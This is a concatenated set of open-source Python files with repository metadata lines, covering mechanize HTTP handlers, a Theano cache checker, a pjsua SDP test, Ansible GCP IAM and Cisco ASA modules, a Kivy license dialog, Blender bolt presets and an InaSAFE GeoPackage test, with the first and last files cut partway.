        self._sleep = time.sleep

    def http_response(self, request, response):
        code, msg, hdrs = response.code, response.msg, response.info()

        if code == 200 and hdrs.has_key("refresh"):
            refresh = hdrs.getheaders("refresh")[0]
            try:
                pause, newurl = parse_refresh_header(refresh)
            except ValueError:
                debug("bad Refresh header: %r" % refresh)
                return response

            if newurl is None:
                # A Refresh with no URL means "reload this page".
                newurl = response.geturl()
            if (self.max_time is None) or (pause <= self.max_time):
                if pause > 1E-3 and self.honor_time:
                    self._sleep(pause)
                hdrs["location"] = newurl
                # hardcoded http is NOT a bug
                response = self.parent.error(
                    "http", request, response,
                    "refresh", msg, hdrs)
            else:
                debug("Refresh header ignored: %r" % refresh)

        return response

    https_response = http_response
class HTTPErrorProcessor(BaseHandler):
    """Process HTTP error responses.

    The purpose of this handler is to allow other response processors a
    look-in by removing the call to parent.error() from
    AbstractHTTPHandler.

    For non-200 error codes, this just passes the job on to the
    Handler.<proto>_error_<code> methods, via the OpenerDirector.error
    method.  Eventually, urllib2.HTTPDefaultErrorHandler will raise an
    HTTPError if no other handler handles the error.

    """
    handler_order = 1000  # after all other processors

    def http_response(self, request, response):
        code, msg, hdrs = response.code, response.msg, response.info()

        if code != 200:
            # hardcoded http is NOT a bug
            response = self.parent.error(
                "http", request, response, code, msg, hdrs)

        return response

    https_response = http_response
class HTTPDefaultErrorHandler(BaseHandler):
    """Last-resort handler: raise any unhandled HTTP error response as an
    HTTPError exception."""

    def http_error_default(self, req, fp, code, msg, hdrs):
        # why these error methods took the code, msg, headers args in the first
        # place rather than a response object, I don't know, but to avoid
        # multiple wrapping, we're discarding them
        already_wrapped = isinstance(fp, urllib2.HTTPError)
        if already_wrapped:
            response = fp
        else:
            response = urllib2.HTTPError(
                req.get_full_url(), code, msg, hdrs, fp)
        # Sanity-check that the discarded args match the response.
        assert code == response.code
        assert msg == response.msg
        assert hdrs == response.hdrs
        raise response
class AbstractHTTPHandler(BaseHandler):
    # Shared machinery for HTTPHandler/HTTPSHandler: request fix-up
    # (do_request_) and the actual network exchange (do_open).
    def __init__(self, debuglevel=0):
        self._debuglevel = debuglevel
    def set_http_debuglevel(self, level):
        # httplib debug level, forwarded to every new connection.
        self._debuglevel = level
    def do_request_(self, request):
        """Add standard headers (Content-type/length for POST, Host, and
        the opener's addheaders) to the request before it is sent."""
        host = request.get_host()
        if not host:
            raise URLError('no host given')
        if request.has_data(): # POST
            data = request.get_data()
            if not request.has_header('Content-type'):
                request.add_unredirected_header(
                    'Content-type',
                    'application/x-www-form-urlencoded')
            if not request.has_header('Content-length'):
                request.add_unredirected_header(
                    'Content-length', '%d' % len(data))
        scheme, sel = urllib.splittype(request.get_selector())
        sel_host, sel_path = urllib.splithost(sel)
        if not request.has_header('Host'):
            # Prefer the host embedded in the selector (proxy case).
            request.add_unredirected_header('Host', sel_host or host)
        for name, value in self.parent.addheaders:
            name = name.capitalize()
            if not request.has_header(name):
                request.add_unredirected_header(name, value)
        return request
    def do_open(self, http_class, req):
        """Return an addinfourl object for the request, using http_class.
        http_class must implement the HTTPConnection API from httplib.
        The addinfourl return value is a file-like object. It also
        has methods and attributes including:
        - info(): return a mimetools.Message object for the headers
        - geturl(): return the original request URL
        - code: HTTP status code
        """
        host_port = req.get_host()
        if not host_port:
            raise URLError('no host given')
        try:
            h = http_class(host_port, timeout=req.timeout)
        except TypeError:
            # Python < 2.6, no per-connection timeout support
            h = http_class(host_port)
        h.set_debuglevel(self._debuglevel)
        headers = dict(req.headers)
        headers.update(req.unredirected_hdrs)
        # We want to make an HTTP/1.1 request, but the addinfourl
        # class isn't prepared to deal with a persistent connection.
        # It will try to read all remaining data from the socket,
        # which will block while the server waits for the next request.
        # So make sure the connection gets closed after the (only)
        # request.
        headers["Connection"] = "close"
        # Normalize header names to Title-Case so duplicates collapse.
        headers = dict(
            [(name.title(), val) for name, val in headers.items()])
        try:
            h.request(req.get_method(), req.get_selector(), req.data, headers)
            r = h.getresponse()
        #except socket.error, err: # XXX what error?
        except (Exception), err: # XXX what error?
            raise URLError(err)
        # Pick apart the HTTPResponse object to get the addinfourl
        # object initialized properly.
        # Wrap the HTTPResponse object in socket's file object adapter
        # for Windows. That adapter calls recv(), so delegate recv()
        # to read(). This weird wrapping allows the returned object to
        # have readline() and readlines() methods.
        # XXX It might be better to extract the read buffering code
        # out of socket._fileobject() and into a base class.
        r.recv = r.read
        fp = create_readline_wrapper(r)
        resp = closeable_response(fp, r.msg, req.get_full_url(),
                                  r.status, r.reason)
        return resp
class HTTPHandler(AbstractHTTPHandler):
    # Plain-HTTP flavour of AbstractHTTPHandler.
    def http_open(self, req):
        return self.do_open(httplib.HTTPConnection, req)
    http_request = AbstractHTTPHandler.do_request_
if hasattr(httplib, 'HTTPS'):
    # HTTPS support is only defined when this Python build has SSL.
    class HTTPSConnectionFactory:
        # Callable building HTTPSConnection objects bound to a fixed
        # client key/certificate pair.
        def __init__(self, key_file, cert_file):
            self._key_file = key_file
            self._cert_file = cert_file
        def __call__(self, hostport):
            return httplib.HTTPSConnection(
                hostport,
                key_file=self._key_file, cert_file=self._cert_file)
    class HTTPSHandler(AbstractHTTPHandler):
        # HTTPS flavour of AbstractHTTPHandler with optional client
        # certificate support via a pluggable client_cert_manager.
        def __init__(self, client_cert_manager=None):
            AbstractHTTPHandler.__init__(self)
            self.client_cert_manager = client_cert_manager
        def https_open(self, req):
            if self.client_cert_manager is not None:
                # Pick the key/cert registered for this URL.
                key_file, cert_file = self.client_cert_manager.find_key_cert(
                    req.get_full_url())
                conn_factory = HTTPSConnectionFactory(key_file, cert_file)
            else:
                conn_factory = httplib.HTTPSConnection
            return self.do_open(conn_factory, req)
        https_request = AbstractHTTPHandler.do_request_
| Andrew-Dickinson/FantasyFRC | customMechanize/_googleappengine.py | Python | gpl-2.0 | 26,831 |
from __future__ import print_function
import six.moves.cPickle as pickle
import os
import sys
import theano
from six import iteritems, itervalues
DISPLAY_DUPLICATE_KEYS = False
DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE = False
# Gather every cache-entry directory, either under the compiledir(s) given
# on the command line or under Theano's configured default compiledir.
dirs = []
if len(sys.argv) > 1:
    for compiledir in sys.argv[1:]:
        dirs.extend([os.path.join(compiledir, d) for d in os.listdir(compiledir)])
else:
    dirs = [os.path.join(theano.config.compiledir, d)
            for d in os.listdir(theano.config.compiledir)]
keys = {}  # pickled key blob -> number of directories containing it
mods = {}  # module source code -> tuple of keys that generated it
for entry_dir in dirs:
    key = None
    try:
        # Read as bytes: pickle.loads() below requires bytes on Python 3,
        # and text mode could also fail to decode arbitrary pickle data.
        # (Bug fix: the file used to be opened in text mode.)
        with open(os.path.join(entry_dir, "key.pkl"), "rb") as key_file:
            key = key_file.read()
        keys[key] = keys.get(key, 0) + 1
    except IOError:
        # Directory has no key.pkl file; still inspect its module source.
        pass
    try:
        path = os.path.join(entry_dir, "mod.cpp")
        if not os.path.exists(path):
            path = os.path.join(entry_dir, "mod.cu")
        with open(path) as mod_file:
            mod = mod_file.read()
        mods.setdefault(mod, ())
        mods[mod] += (key,)
    except IOError:
        print(entry_dir, "don't have a mod.{cpp,cu} file")
if DISPLAY_DUPLICATE_KEYS:
    for k, v in iteritems(keys):
        if v > 1:
            print("Duplicate key (%i copies): %s" % (v, pickle.loads(k)))
# Histogram: how many keys were seen exactly N times.
nbs_keys = {}
for val in itervalues(keys):
    nbs_keys[val] = nbs_keys.get(val, 0) + 1
# Histogram: how many module sources were generated by exactly N keys.
nbs_mod = {}
nbs_mod_to_key = {}  # nb seen -> the keys of one such module
more_than_one = 0
for mod, kk in iteritems(mods):
    val = len(kk)
    nbs_mod[val] = nbs_mod.get(val, 0) + 1
    if val > 1:
        more_than_one += 1
    nbs_mod_to_key[val] = kk
if DISPLAY_MOST_FREQUENT_DUPLICATE_CCODE:
    m = max(nbs_mod.keys())
    print("The keys associated to the mod.{cpp,cu} with the most number of copy:")
    for kk in nbs_mod_to_key[m]:
        kk = pickle.loads(kk)
        print(kk)
print("key.pkl histograph")
print(sorted(nbs_keys.items()))
print("mod.{cpp,cu} histogram")
print(sorted(nbs_mod.items()))
# A module is "useless" when the same generated source exists under more
# than one cache key.
total = sum(len(k) for k in mods.values())
uniq = len(mods)
useless = total - uniq
print("mod.{cpp,cu} total:", total)
print("mod.{cpp,cu} uniq:", uniq)
print("mod.{cpp,cu} with more than 1 copy:", more_than_one)
print("mod.{cpp,cu} useless:", useless, float(useless) / total * 100, "%")
print("nb directory", len(dirs))
| valexandersaulys/airbnb_kaggle_contest | venv/lib/python3.4/site-packages/Theano-0.7.0-py3.4.egg/theano/misc/check_duplicate_key.py | Python | gpl-2.0 | 2,482 |
# $Id: 126_sdp_with_port_0_and_no_rtpmap_for_dynamic_pt.py 369517 2012-07-01 17:28:57Z file $
import inc_sip as sip
import inc_sdp as sdp
# SDP offer with the video stream disabled (port 0) and no rtpmap for its
# dynamic payload type (100); audio uses static payload 0 on port 5000.
sdp = \
"""
v=0
o=- 0 0 IN IP4 127.0.0.1
s=-
c=IN IP4 127.0.0.1
t=0 0
m=video 0 RTP/AVP 100
m=audio 5000 RTP/AVP 0
"""
# Run pjsua without a sound device and auto-answer the call with 200 OK.
pjsua_args = "--null-audio --auto-answer 200"
extra_headers = ""
# The 200 answer must keep the video m-line disabled (port 0) and give the
# audio m-line a non-zero port.
include = ["Content-Type: application/sdp", # response must include SDP
           "m=video 0 RTP/AVP[\\s\\S]+m=audio [1-9]+[0-9]* RTP/AVP"
          ]
exclude = []
sendto_cfg = sip.SendtoCfg("SDP media with port 0 and no rtpmap for dynamic PT", pjsua_args, sdp, 200,
                           extra_headers=extra_headers,
                           resp_inc=include, resp_exc=exclude)
| fluentstream/asterisk-p2p | res/pjproject/tests/pjsua/scripts-sendto/126_sdp_with_port_0_and_no_rtpmap_for_dynamic_pt.py | Python | gpl-2.0 | 659 |
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Google
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
# ----------------------------------------------------------------------------
#
# *** AUTO GENERATED CODE *** AUTO GENERATED CODE ***
#
# ----------------------------------------------------------------------------
#
# This file is automatically generated by Magic Modules and manual
# changes will be clobbered when the file is regenerated.
#
# Please read more about how to change this file at
# https://www.github.com/GoogleCloudPlatform/magic-modules
#
# ----------------------------------------------------------------------------
from __future__ import absolute_import, division, print_function
__metaclass__ = type
################################################################################
# Documentation
################################################################################
ANSIBLE_METADATA = {'metadata_version': '1.1', 'status': ["preview"], 'supported_by': 'community'}
DOCUMENTATION = '''
---
module: gcp_iam_role
description:
- A role in the Identity and Access Management API .
short_description: Creates a GCP Role
version_added: 2.8
author: Google Inc. (@googlecloudplatform)
requirements:
- python >= 2.6
- requests >= 2.18.4
- google-auth >= 1.3.0
options:
state:
description:
- Whether the given object should exist in GCP
choices:
- present
- absent
default: present
name:
description:
- The name of the role.
required: true
title:
description:
- A human-readable title for the role. Typically this is limited to 100 UTF-8
bytes.
required: false
description:
description:
- Human-readable description for the role.
required: false
included_permissions:
description:
- Names of permissions this role grants when bound in an IAM policy.
required: false
stage:
description:
- The current launch stage of the role.
- 'Some valid choices include: "ALPHA", "BETA", "GA", "DEPRECATED", "DISABLED",
"EAP"'
required: false
extends_documentation_fragment: gcp
'''
EXAMPLES = '''
- name: create a role
gcp_iam_role:
name: myCustomRole2
title: My Custom Role
description: My custom role description
included_permissions:
- iam.roles.list
- iam.roles.create
- iam.roles.delete
project: test_project
auth_kind: serviceaccount
service_account_file: "/tmp/auth.pem"
state: present
'''
RETURN = '''
name:
description:
- The name of the role.
returned: success
type: str
title:
description:
- A human-readable title for the role. Typically this is limited to 100 UTF-8 bytes.
returned: success
type: str
description:
description:
- Human-readable description for the role.
returned: success
type: str
includedPermissions:
description:
- Names of permissions this role grants when bound in an IAM policy.
returned: success
type: list
stage:
description:
- The current launch stage of the role.
returned: success
type: str
deleted:
description:
- The current deleted state of the role.
returned: success
type: bool
'''
################################################################################
# Imports
################################################################################
from ansible.module_utils.gcp_utils import navigate_hash, GcpSession, GcpModule, GcpRequest, replace_resource_dict
import json
################################################################################
# Main
################################################################################
def main():
    """Main function"""
    module = GcpModule(
        argument_spec=dict(
            state=dict(default='present', choices=['present', 'absent'], type='str'),
            name=dict(required=True, type='str'),
            title=dict(type='str'),
            description=dict(type='str'),
            included_permissions=dict(type='list', elements='str'),
            stage=dict(type='str'),
        )
    )
    # Default OAuth scope for the IAM API.
    if not module.params['scopes']:
        module.params['scopes'] = ['https://www.googleapis.com/auth/iam']
    state = module.params['state']
    # Read the live role (None when it does not exist).
    fetch = fetch_resource(module, self_link(module))
    changed = False
    if fetch:
        if state == 'present':
            # Update only when the live role differs from the request.
            if is_different(module, fetch):
                update(module, self_link(module), fetch)
                fetch = fetch_resource(module, self_link(module))
                changed = True
        else:
            delete(module, self_link(module))
            fetch = {}
            changed = True
    else:
        if state == 'present':
            fetch = create(module, collection(module))
            changed = True
        else:
            # state=absent and the role is already missing: nothing to do.
            fetch = {}
    fetch.update({'changed': changed})
    module.exit_json(**fetch)
def create(module, link):
    """POST the new custom role to the collection URL and return the result."""
    auth = GcpSession(module, 'iam')
    return return_if_object(module, auth.post(link, resource_to_create(module)))
def update(module, link, fetch):
    """PUT the changed fields to the role URL, restricted by an updateMask."""
    auth = GcpSession(module, 'iam')
    # Only send fields that differ between the request and the live role.
    params = {'updateMask': updateMask(resource_to_request(module), response_to_hash(module, fetch))}
    request = resource_to_request(module)
    # 'name' identifies the role and is not sent in the update body.
    del request['name']
    return return_if_object(module, auth.put(link, request, params=params))
def updateMask(request, response):
    """Build the comma-separated updateMask of fields that differ.

    Field order in the mask follows the fixed list below, matching the
    order the API request body is built in.
    """
    tracked_fields = ['name', 'title', 'description',
                      'includedPermissions', 'stage']
    changed = [field for field in tracked_fields
               if request.get(field) != response.get(field)]
    return ','.join(changed)
def delete(module, link):
    """DELETE the role at the given URL and return the parsed response."""
    auth = GcpSession(module, 'iam')
    return return_if_object(module, auth.delete(link))
def resource_to_request(module):
    """Map Ansible parameters onto the API request body.

    Empty/None values are dropped; an explicit boolean False is kept.
    """
    request = {
        u'name': module.params.get('name'),
        u'title': module.params.get('title'),
        u'description': module.params.get('description'),
        u'includedPermissions': module.params.get('included_permissions'),
        u'stage': module.params.get('stage'),
    }
    return {key: value for key, value in request.items()
            if value or value is False}
def fetch_resource(module, link, allow_not_found=True):
    """GET the role; return None on 404 when allow_not_found is True."""
    auth = GcpSession(module, 'iam')
    return return_if_object(module, auth.get(link), allow_not_found)
def self_link(module):
    """Return the canonical URL of this project-level custom role."""
    return ("https://iam.googleapis.com/v1/projects/%(project)s/roles/%(name)s"
            % module.params)
def collection(module):
    """Return the URL of the project's custom-role collection."""
    return ("https://iam.googleapis.com/v1/projects/%(project)s/roles"
            % module.params)
def return_if_object(module, response, allow_not_found=False):
    """Decode an API response, failing the module on errors.

    Returns None for 404 (when allowed) and 204; otherwise the decoded
    JSON body with the role name stripped to its short form.
    """
    # If not found, return nothing.
    if allow_not_found and response.status_code == 404:
        return None
    # If no content, return nothing.
    if response.status_code == 204:
        return None
    try:
        module.raise_for_status(response)
        result = response.json()
    except getattr(json.decoder, 'JSONDecodeError', ValueError):
        module.fail_json(msg="Invalid JSON response with error: %s" % response.text)
    result = decode_response(result, module)
    # Surface API-level errors embedded in an otherwise-OK body.
    if navigate_hash(result, ['error', 'errors']):
        module.fail_json(msg=navigate_hash(result, ['error', 'errors']))
    return result
def is_different(module, response):
    """Return True when the live role differs from the requested state.

    Both sides are reduced to the keys they share so output-only fields
    (e.g. 'deleted') and unspecified parameters do not trigger updates.
    """
    request = resource_to_request(module)
    response = response_to_hash(module, response)
    request = decode_response(request, module)
    # Remove all output-only from response.
    response_vals = {}
    for k, v in response.items():
        if k in request:
            response_vals[k] = v
    request_vals = {}
    for k, v in request.items():
        if k in response:
            request_vals[k] = v
    return GcpRequest(request_vals) != GcpRequest(response_vals)
# Remove unnecessary properties from the response.
# This is for doing comparisons with Ansible's current parameters.
def response_to_hash(module, response):
    """Project the API response onto the fields this module manages."""
    returned_fields = (
        u'name',
        u'title',
        u'description',
        u'includedPermissions',
        u'stage',
        u'deleted',
    )
    return {field: response.get(field) for field in returned_fields}
def resource_to_create(module):
    """Wrap the request body in the create-role envelope the API expects.

    The role id travels as 'roleId'; the body itself must not carry
    'name'.
    """
    role = resource_to_request(module)
    role.pop('name')
    return {'roleId': module.params['name'], 'role': role}
def decode_response(response, module):
    """Strip any 'projects/<p>/roles/' prefix from the role name in place."""
    if 'name' in response:
        response['name'] = response['name'].rsplit('/', 1)[-1]
    return response
if __name__ == '__main__':
main()
| t794104/ansible | lib/ansible/modules/cloud/google/gcp_iam_role.py | Python | gpl-3.0 | 9,028 |
class Token:
    """A lexical token.

    Attributes:
        kind:   the token category, e.g. filename, number, other
        value:  the concrete instance value, e.g. "/tmp/foo.c" or 5
        offset: byte offset from the start of the parse string
    """
    def __init__(self, kind, value=None, offset=None):
        self.offset = offset
        self.kind = kind
        self.value = value
    def __eq__(self, o):
        """'==' compares kinds only; value and offset are ignored."""
        other_kind = o.kind if isinstance(o, Token) else o
        return self.kind == other_kind
    def __repr__(self):
        return str(self.kind)
    def __repr1__(self, indent, sib_num=''):
        return self.format(line_prefix=indent, sib_num=sib_num)
    def __str__(self):
        return self.format(line_prefix='')
    def format(self, line_prefix='', sib_num=None):
        """Render as '<prefix><sib_num><offset> <kind> [<value>]'."""
        sib_part = "%d." % sib_num if sib_num else ''
        prefix = '%s%s' % (line_prefix, sib_part)
        offset_opname = '%5s %-10s' % (self.offset, self.kind)
        if self.value:
            return "%s%s %s" % (prefix, offset_opname, self.value)
        return "%s%s" % (prefix, offset_opname)
    def __hash__(self):
        # Hash on kind alone, consistent with __eq__.
        return hash(self.kind)
    def __getitem__(self, i):
        # Tokens are leaves in the parse tree; they have no children.
        raise IndexError
| rocky/python3-trepan | trepan/processor/parse/tok.py | Python | gpl-3.0 | 1,426 |
# -*- coding: utf-8 -*-
#
# license.py
#
# Выводит окно с текстом лицензии.
#
import os
from kivy.clock import Clock
from kivy.uix.rst import RstDocument
from libs.uix.dialogs import dialog, card
class ShowLicense(object):
    """Mixin that displays the program license in a scrollable card.

    A language-choice dialog is shown first; while the license file is
    loaded, a temporary "please wait" dialog is displayed.
    """
    def show_license(self, *args):
        """Ask for a language, then load and show the license text."""
        def choice_language_license(on_language):
            # Show the wait dialog now and defer the (blocking) file read
            # to the next frame so the UI can repaint first.
            wait_window = dialog(text=self.data.string_lang_wait, title=self.title)
            Clock.schedule_once(
                lambda *args: display_license(wait_window, on_language), 0
            )
            choice_dialog.dismiss()
        def display_license(wait_window, on_language):
            # BUG FIX: this parameter used to be named ``dialog``, which
            # shadowed the imported dialog() factory, so the "license not
            # found" branch called the wait window itself instead of
            # opening a new dialog.  Renamed to restore the factory.
            path_to_license = '{}/license/license_{}.rst'.format(
                self.directory, self.data.dict_language[on_language]
            )
            if not os.path.exists(path_to_license):
                dialog(text=self.data.string_lang_not_license, title=self.title)
                wait_window.dismiss()
                return
            # Close the file handle instead of leaking it.
            with open(path_to_license) as license_file:
                text_license = license_file.read()
            widget_license = RstDocument(
                text=text_license, background_color=self.data.alpha,
                underline_color=self.data.underline_rst_color
            )
            card(widget_license, size=(.9, .8))
            wait_window.dismiss()
        choice_dialog = dialog(
            text=self.data.string_lang_prev_license, title=self.title,
            buttons=[
                [self.data.string_lang_on_russian,
                 lambda *x: choice_language_license(self.data.string_lang_on_russian)],
                [self.data.string_lang_on_english,
                 lambda *x: choice_language_license(self.data.string_lang_on_english)]
            ]
        )
| Dezmonius/Deslium | Deslium Software/Deslium Hestia/master/libs/programclass/show_license.py | Python | gpl-3.0 | 1,705 |
props.bf_Shank_Dia = 5.0
#props.bf_Pitch = 0.8 # Coarse
props.bf_Pitch = 0.5 # Fine
props.bf_Crest_Percent = 10
props.bf_Root_Percent = 10
props.bf_Major_Dia = 5.0
props.bf_Minor_Dia = props.bf_Major_Dia - (1.082532 * props.bf_Pitch)
props.bf_Hex_Head_Flat_Distance = 8.0
props.bf_Hex_Head_Height = 3.5
props.bf_Cap_Head_Dia = 8.5
props.bf_Cap_Head_Height = 5.0
props.bf_CounterSink_Head_Dia = 10.4
props.bf_Allen_Bit_Flat_Distance = 4.0
props.bf_Allen_Bit_Depth = 2.5
props.bf_Pan_Head_Dia = 9.5
props.bf_Dome_Head_Dia = 9.5
props.bf_Philips_Bit_Dia = props.bf_Pan_Head_Dia * (1.82 / 5.6)
#props.bf_Phillips_Bit_Depth = Get_Phillips_Bit_Height(props.bf_Philips_Bit_Dia)
props.bf_Hex_Nut_Height = 4.0
props.bf_Hex_Nut_Flat_Distance = 8.0
props.bf_Thread_Length = 10
props.bf_Shank_Length = 0.0
| cschenck/blender_sim | fluid_sim_deps/blender-2.69/2.69/scripts/addons/add_mesh_BoltFactory/presets/M5.py | Python | gpl-3.0 | 795 |
# ------------------------------------------------------------------
# Copyright (c) 2020 PyInstaller Development Team.
#
# This file is distributed under the terms of the GNU General Public
# License (version 2.0 or later).
#
# The full license is available in LICENSE.GPL.txt, distributed with
# this software.
#
# SPDX-License-Identifier: GPL-2.0-or-later
# ------------------------------------------------------------------
hiddenimports = ["sql_mar"]
| etherkit/OpenBeacon2 | macos/venv/lib/python3.8/site-packages/_pyinstaller_hooks_contrib/hooks/stdhooks/hook-gadfly.py | Python | gpl-3.0 | 458 |
# This code is part of Ansible, but is an independent component.
# This particular file snippet, and this file snippet only, is BSD licensed.
# Modules you write using this snippet, which is embedded dynamically by Ansible
# still belong to the author of the module, and may assign their own license
# to the complete work.
#
# (c) 2016 Red Hat Inc.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED.
# IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO,
# PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
# USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
from ansible.module_utils._text import to_text
from ansible.module_utils.basic import env_fallback, return_values
from ansible.module_utils.network_common import to_list, EntityCollection
from ansible.module_utils.connection import Connection
_DEVICE_CONFIGS = {}
_CONNECTION = None
asa_argument_spec = {
'host': dict(),
'port': dict(type='int'),
'username': dict(fallback=(env_fallback, ['ANSIBLE_NET_USERNAME'])),
'password': dict(fallback=(env_fallback, ['ANSIBLE_NET_PASSWORD']), no_log=True),
'ssh_keyfile': dict(fallback=(env_fallback, ['ANSIBLE_NET_SSH_KEYFILE']), type='path'),
'authorize': dict(fallback=(env_fallback, ['ANSIBLE_NET_AUTHORIZE']), type='bool'),
'auth_pass': dict(fallback=(env_fallback, ['ANSIBLE_NET_AUTH_PASS']), no_log=True),
'timeout': dict(type='int'),
'provider': dict(type='dict'),
'context': dict()
}
command_spec = {
'command': dict(key=True),
'prompt': dict(),
'answer': dict()
}
def get_argspec():
    """Return the argument spec shared by the Cisco ASA modules."""
    return asa_argument_spec
def check_args(module):
    """Warn about deprecated top-level connection args and hide secrets.

    Any 'auth_pass'/'password' values inside the provider dict are
    registered as no-log values so they never appear in module output.
    """
    provider = module.params['provider'] or {}
    for key in asa_argument_spec:
        if key not in ['provider', 'authorize'] and module.params[key]:
            module.warn('argument %s has been deprecated and will be removed in a future version' % key)
    if provider:
        for param in ('auth_pass', 'password'):
            if provider.get(param):
                module.no_log_values.update(return_values(provider[param]))
def get_connection(module):
    """Return the module-wide persistent Connection, creating it on first use.

    When the 'context' parameter is set, a 'changeto' command is issued
    right after connecting so all later commands run in that security
    context ('system' selects the system context).
    """
    global _CONNECTION
    if _CONNECTION:
        return _CONNECTION
    _CONNECTION = Connection(module)
    context = module.params['context']
    if context:
        if context == 'system':
            command = 'changeto system'
        else:
            command = 'changeto context %s' % context
        _CONNECTION.get(command)
    return _CONNECTION
def to_commands(module, commands):
    """Normalize a list of commands into command/prompt/answer dicts.

    In check mode, non-'show' commands trigger a warning because they
    would change device state.
    """
    # NOTE(review): assert is stripped under `python -O`; an explicit
    # TypeError would be more robust for input validation.
    assert isinstance(commands, list), 'argument must be of type <list>'
    transform = EntityCollection(module, command_spec)
    commands = transform(commands)
    for index, item in enumerate(commands):
        if module.check_mode and not item['command'].startswith('show'):
            module.warn('only show commands are supported when using check '
                        'mode, not executing `%s`' % item['command'])
    return commands
def run_commands(module, commands, check_rc=True):
    """Run each command over the persistent connection.

    Returns the decoded text output, one entry per command, in order.
    check_rc is accepted for interface compatibility and not used here.
    """
    commands = to_commands(module, to_list(commands))
    connection = get_connection(module)
    responses = list()
    for cmd in commands:
        out = connection.get(**cmd)
        responses.append(to_text(out, errors='surrogate_then_replace'))
    return responses
def get_config(module, flags=None):
    """Return the device running-config, cached per flag combination.

    :param module: AnsibleModule with an active persistent connection
    :param flags: optional list of extra 'show running-config' options
    :returns: the configuration text

    Fix: the flags parameter previously used a mutable default (``[]``),
    a classic Python pitfall; ``None`` is now the sentinel.
    """
    flags = [] if flags is None else flags
    cmd = 'show running-config '
    cmd += ' '.join(flags)
    cmd = cmd.strip()
    try:
        # Serve repeated requests for the same command from the cache.
        return _DEVICE_CONFIGS[cmd]
    except KeyError:
        conn = get_connection(module)
        out = conn.get(cmd)
        cfg = to_text(out, errors='surrogate_then_replace').strip()
        _DEVICE_CONFIGS[cmd] = cfg
        return cfg
def load_config(module, config):
    """Push configuration lines to the device over the connection."""
    conn = get_connection(module)
    conn.edit_config(config)
def get_defaults_flag(module):
    """Determine which keyword makes 'show running-config' include defaults.

    Probes 'show running-config ?' and returns 'all' when the device
    supports it, else 'full'.

    Fix: the original called exec_command(), which is neither defined
    nor imported in this module and raised NameError at runtime; the
    probe now goes over the persistent connection like every other
    command in this file.
    """
    connection = get_connection(module)
    out = connection.get('show running-config ?')
    out = to_text(out, errors='surrogate_then_replace')
    commands = set()
    for line in out.splitlines():
        if line:
            # First word of each completion line is the candidate keyword.
            commands.add(line.strip().split()[0])
    if 'all' in commands:
        return 'all'
    return 'full'
| leki75/ansible | lib/ansible/module_utils/asa.py | Python | gpl-3.0 | 5,158 |
# coding=utf-8
"""
InaSAFE Disaster risk assessment tool by AusAid - **Clipper test suite.**
Contact : ole.moller.nielsen@gmail.com
.. note:: This program is free software; you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation; either version 2 of the License, or
(at your option) any later version.
"""
import unittest
import sys
from tempfile import mktemp
from qgis.core import QgsVectorLayer, QgsRasterLayer
from PyQt4.QtCore import QFileInfo
from osgeo import gdal
from safe.test.utilities import (
get_qgis_app,
load_test_vector_layer,
standard_data_path)
QGIS_APP, CANVAS, IFACE, PARENT = get_qgis_app()
from safe.datastore.geopackage import GeoPackage
# Decorator for expecting fails in windows but not other OS's
# Probably we should move this somewhere in utils for easy re-use...TS
def expect_failure_in_windows(exception):
    """Marks test to expect a fail in windows - call assertRaises internally.

    On Windows the decorated test asserts that ``exception`` is raised;
    on every other platform the test body runs normally.

    Fix: the original had no else branch, so on non-Windows platforms
    the decorated test body was silently skipped (the in-file comment
    "Should pass on other platforms" shows it was meant to run).

    ..versionadded:: 4.0.0
    """
    def test_decorator(fn):
        def test_decorated(self, *args, **kwargs):
            if sys.platform.startswith('win'):
                self.assertRaises(exception, fn, self, *args, **kwargs)
            else:
                return fn(self, *args, **kwargs)
        return test_decorated
    return test_decorator
class TestGeoPackage(unittest.TestCase):
    """Test the GeoPackage datastore."""
    def setUp(self):
        pass
    def tearDown(self):
        pass
    @unittest.skipIf(
        int(gdal.VersionInfo('VERSION_NUM')) < 2000000,
        'GDAL 2.0 is required for geopackage.')
    def test_create_geopackage(self):
        """Test if we can store geopackage."""
        # Create a geopackage from an empty file.
        path = QFileInfo(mktemp() + '.gpkg')
        self.assertFalse(path.exists())
        data_store = GeoPackage(path)
        path.refresh()
        self.assertTrue(path.exists())
        # Let's add a vector layer.
        layer_name = 'flood_test'
        layer = standard_data_path('hazard', 'flood_multipart_polygons.shp')
        vector_layer = QgsVectorLayer(layer, 'Flood', 'ogr')
        result = data_store.add_layer(vector_layer, layer_name)
        self.assertTrue(result[0])
        # We should have one layer.
        layers = data_store.layers()
        self.assertEqual(len(layers), 1)
        self.assertIn(layer_name, layers)
        # Add the same layer with another name.
        layer_name = 'another_vector_flood'
        result = data_store.add_layer(vector_layer, layer_name)
        self.assertTrue(result[0])
        # We should have two layers.
        layers = data_store.layers()
        self.assertEqual(len(layers), 2)
        self.assertIn(layer_name, layers)
        # Test the URI of the new layer.
        expected = path.absoluteFilePath() + '|layername=' + layer_name
        self.assertEqual(data_store.layer_uri(layer_name), expected)
        # Test a fake layer.
